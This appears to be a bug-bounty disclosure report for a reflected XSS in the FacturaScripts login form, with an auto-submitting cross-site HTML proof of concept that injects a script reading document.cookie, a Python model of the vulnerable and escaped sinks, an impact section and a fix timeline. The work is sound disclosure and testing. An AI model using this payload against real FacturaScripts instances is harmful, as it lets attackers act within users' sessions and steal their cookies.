Reflected XSS in facturascripts in neorazorx/facturascripts

Valid

Reported on

Apr 27th 2022


Description

FacturaScripts reflects the fsNick parameter (submitted by POST to / together with fsPassword, i.e. the login form fields) back into the response without HTML-encoding it. A value containing quotes and angle brackets therefore breaks out of its context and executes attacker-supplied script in the browser of whoever submits it (reflected XSS).

Proof of Concept

Save this code as poc.html (change the host in the form action if the target is not localhost):

<html>
  <body>
    <!-- Rewrite the address bar to "/" so the victim does not see the local file path -->
    <script>history.pushState('', '', '/')</script>
    <!-- Cross-site POST carrying the payload in fsNick; fsPassword is just filler -->
    <form action="http://localhost/" method="POST">
      <!-- The value is HTML-entity-encoded so it survives inside the attribute; the browser decodes it before submitting -->
      <input type="hidden" name="fsNick" value="1&apos;&quot;&#40;&#41;&amp;&#37;&lt;acx&gt;&lt;ScRiPt&#32;&gt;alert&#40;document&#46;cookie&#41;&lt;&#47;ScRiPt&gt;" />
      <input type="hidden" name="fsPassword" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <!-- Submit automatically so no click is required -->
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Open the file in your browser: the form submits itself to the target, the response echoes the decoded value (1'"()&%<acx><ScRiPt >alert(document.cookie)</ScRiPt>) unescaped, and the alert fires, confirming the XSS.
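To make the mechanism concrete, the following added example (not FacturaScripts code, which is PHP, and not the fix in commit 73a659) models the reflected sink in Python: it decodes the PoC's entity-encoded fsNick value to what the browser actually submits, renders it through a vulnerable and a hardened stand-in template, and applies the checks a tester would run after a fix. The template strings and function names are assumptions chosen for illustration.

```python
import html
import re

# Constructed inputs for this example: the fsNick value exactly as it appears in
# the PoC above (HTML-entity-encoded so it survives inside a value="..." attribute)
# and the raw string the browser submits after decoding it.
POC_VALUE = ("1&apos;&quot;&#40;&#41;&amp;&#37;&lt;acx&gt;&lt;ScRiPt&#32;&gt;"
             "alert&#40;document&#46;cookie&#41;&lt;&#47;ScRiPt&gt;")
PAYLOAD = "1'\"()&%<acx><ScRiPt >alert(document.cookie)</ScRiPt>"


def decode_poc_value(entity_encoded: str) -> str:
    """Return what the browser submits for the hidden input: the entity-decoded value."""
    return html.unescape(entity_encoded)


def render_login_vulnerable(nick: str) -> str:
    """Stand-in for the vulnerable sink (assumed template, not FacturaScripts code):
    the submitted nick is concatenated straight back into the form's value attribute."""
    return f'<input type="text" name="fsNick" value="{nick}">'


def render_login_fixed(nick: str) -> str:
    """Hardened stand-in: encode for the attribute context before reflecting.
    quote=True turns & < > " and ' into entities, so the value can neither close
    the attribute nor open a tag (PHP equivalent: htmlspecialchars($nick, ENT_QUOTES, 'UTF-8'))."""
    return f'<input type="text" name="fsNick" value="{html.escape(nick, quote=True)}">'


_SCRIPT_OPEN = re.compile(r"<\s*script\b", re.IGNORECASE)
_VALUE_ATTR = re.compile(r'value="([^"]*)"')


def reflects_unescaped(body: str, payload: str) -> bool:
    """True when the attacker's input appears verbatim in the HTML, angle brackets
    and quotes included; that is the condition that makes the reflection exploitable."""
    return payload in body


def has_script_tag(body: str) -> bool:
    """True when the response contains an opening <script> tag in any letter case
    (the PoC uses 'ScRiPt' to get past naive lowercase filters)."""
    return _SCRIPT_OPEN.search(body) is not None


def attribute_value(body: str) -> str:
    """What an HTML parser keeps as the value attribute. On the vulnerable page the
    first '"' in the payload terminates the attribute early; on the fixed page the
    full original string round-trips through the encoding."""
    m = _VALUE_ATTR.search(body)
    return html.unescape(m.group(1)) if m else ""


def check_reflection(render) -> dict:
    """Run the three checks against one rendering function."""
    body = render(PAYLOAD)
    return {
        "reflected_unescaped": reflects_unescaped(body, PAYLOAD),
        "script_tag": has_script_tag(body),
        "value_intact": attribute_value(body) == PAYLOAD,
    }


if __name__ == "__main__":
    assert decode_poc_value(POC_VALUE) == PAYLOAD
    print("vulnerable:", check_reflection(render_login_vulnerable))
    print("fixed:     ", check_reflection(render_login_fixed))
```

Running it shows the vulnerable rendering reflecting the payload verbatim with a live script tag and a truncated attribute, while the fixed rendering contains no `<script` at all yet still preserves the submitted nick once the browser decodes the entities. A string check like this is a useful regression test, but it is not a substitute for loading the real response in a browser, since the exploitable condition depends on the exact context the value lands in.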

Impact

The injected script runs in the origin of the FacturaScripts instance, in the victim's browser. An attacker who gets a user to open a page like poc.html can therefore act with that user's session (issue requests, alter data, deface pages served to that user) and, unless the session cookie is flagged HttpOnly, read it via document.cookie as the PoC demonstrates. Because the vector is a POST parameter, the payload has to be delivered through an attacker-controlled page rather than a plain link, which is why the PoC auto-submits a form.

Timeline

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours.
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back.
Carlos Garcia validated this vulnerability.
minhnb has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
The researcher's credibility has increased: +7
Carlos Garcia confirmed that a fix has been merged on 73a659.
The fix bounty has been dropped.